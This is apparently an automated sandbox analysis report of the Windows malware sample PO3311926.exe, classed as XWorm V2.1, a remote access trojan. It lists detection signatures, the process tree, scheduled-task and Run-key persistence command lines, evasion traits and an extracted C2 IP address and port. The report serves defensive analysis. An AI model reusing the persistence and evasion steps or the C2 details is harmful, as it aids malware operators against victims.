Edit tour

Windows Analysis Report
PO3311926.exe

Overview

General Information

Sample name:	PO3311926.exe
Analysis ID:	1433216
MD5:	543e7940dd0ac8e9e42c0120515ec6b6
SHA1:	6dca4a5e851e1ccae98afba16d01a5f9b9553c59
SHA256:	c1bf9e8d217baf7a33931f25d96ff9eab4c24f9702beaa41a91bcab3745a1875
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM autoit script

Yara detected Autoit Injector

Yara detected XWorm

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Found API chain indicative of sandbox detection

Injects a PE file into a foreign processes

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses ipconfig to lookup or modify the Windows network settings

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query the security center for anti-virus and firewall products

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

OS version to string mapping found (often used in BOTs)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use NTFS Short Name in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

PO3311926.exe (PID: 6880 cmdline: "C:\Users\user\Desktop\PO3311926.exe" MD5: 543E7940DD0AC8E9E42C0120515EC6B6)

wscript.exe (PID: 6756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2292 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 2944 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

cmd.exe (PID: 6052 cmdline: "C:\Windows\System32\cmd.exe" /c sdadbtvsh.bin nngqrvwq.xl MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sdadbtvsh.bin (PID: 3232 cmdline: sdadbtvsh.bin nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)

RegSvcs.exe (PID: 4080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

schtasks.exe (PID: 4932 cmdline: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5652 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 3280 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

RegSvcs.exe (PID: 5744 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sdadbtvsh.bin.exe (PID: 6064 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)

RegSvcs.exe (PID: 1036 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 4692 cmdline: "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 2160 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sdadbtvsh.bin.exe (PID: 5308 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)

RegSvcs.exe (PID: 6916 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 2940 cmdline: "C:\Users\user\AppData\Roaming\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 2688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

sdadbtvsh.bin.exe (PID: 5924 cmdline: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl MD5: EEAA0F5D82E56659C80FA84D588BF870)

RegSvcs.exe (PID: 6444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 3672 cmdline: C:\Users\user\AppData\Roaming\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

conhost.exe (PID: 2512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["102.165.14.26"], "Port": "5007", "Aes key": "5007", "Install file": "USB.exe", "Version": "XWorm V2.1"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\wrse\nngqrvwq.xl	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
C:\Users\user\AppData\Local\Temp\RarSFX0\nngqrvwq.xl	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: sdadbtvsh.bin PID: 3232	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: sdadbtvsh.bin PID: 3232	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
Process Memory Space: sdadbtvsh.bin PID: 3232	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 6064	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 6064	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 6064	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 1036	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5308	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5308	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5308	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5924	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5924	JoeSecurity_AutoitInjector	Yara detected Autoit Injector	Joe Security
Process Memory Space: sdadbtvsh.bin.exe PID: 5924	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author
21.2.RegSvcs.exe.500000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
8.3.sdadbtvsh.bin.17b6130.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Roaming\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Roaming\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Roaming\RegSvcs.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Users\user\AppData\Roaming\RegSvcs.exe, ProcessId: 5744, ProcessName: RegSvcs.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6756, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2292, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\RegSvcs.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvcs

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 4080, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "RegSvcs" /tr "C:\Users\user\AppData\Roaming\RegSvcs.exe", ProcessId: 4932, ProcessName: schtasks.exe

Sigma detected: Use NTFS Short Name in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, CommandLine: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, CommandLine|base64offset|contains: , Image: C:\Users\user\wrse\sdadbtvsh.bin.exe, NewProcessName: C:\Users\user\wrse\sdadbtvsh.bin.exe, OriginalFileName: C:\Users\user\wrse\sdadbtvsh.bin.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl, ProcessId: 6064, ProcessName: sdadbtvsh.bin.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PO3311926.exe", ParentImage: C:\Users\user\Desktop\PO3311926.exe, ParentProcessId: 6880, ParentProcessName: PO3311926.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\vjpj.vbe" , ProcessId: 6756, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\wrse\SDADBT~1.EXE C:\Users\user\wrse\nngqrvwq.xl, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin, ProcessId: 3232, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack

Malware Configuration Extractor: Xworm {"C2 url": ["102.165.14.26"], "Port": "5007", "Aes key": "5007", "Install file": "USB.exe", "Version": "XWorm V2.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Virustotal: Detection: 27%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin.exe	Virustotal: Detection: 27%	Perma Link
Source: C:\Users\user\wrse\sdadbtvsh.bin	ReversingLabs: Detection: 26%
Source: C:\Users\user\wrse\sdadbtvsh.bin	Virustotal: Detection: 27%	Perma Link
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Virustotal: Detection: 27%	Perma Link

Multi AV Scanner detection for submitted file

Source: PO3311926.exe	ReversingLabs: Detection: 68%
Source: PO3311926.exe	Virustotal: Detection: 55%			Perma Link

Source: PO3311926.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49707 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.8:49730 version: TLS 1.2

Source: PO3311926.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PO3311926.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000012.00000000.1618125774.0000000000D32000.00000002.00000001.01000000.0000000D.sdmp, RegSvcs.exe.15.dr

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BAA69B
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BBC220
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BCB348 FindFirstFileExA,	0_2_00BCB348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_005FE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_005FD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_005FDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00609F9F
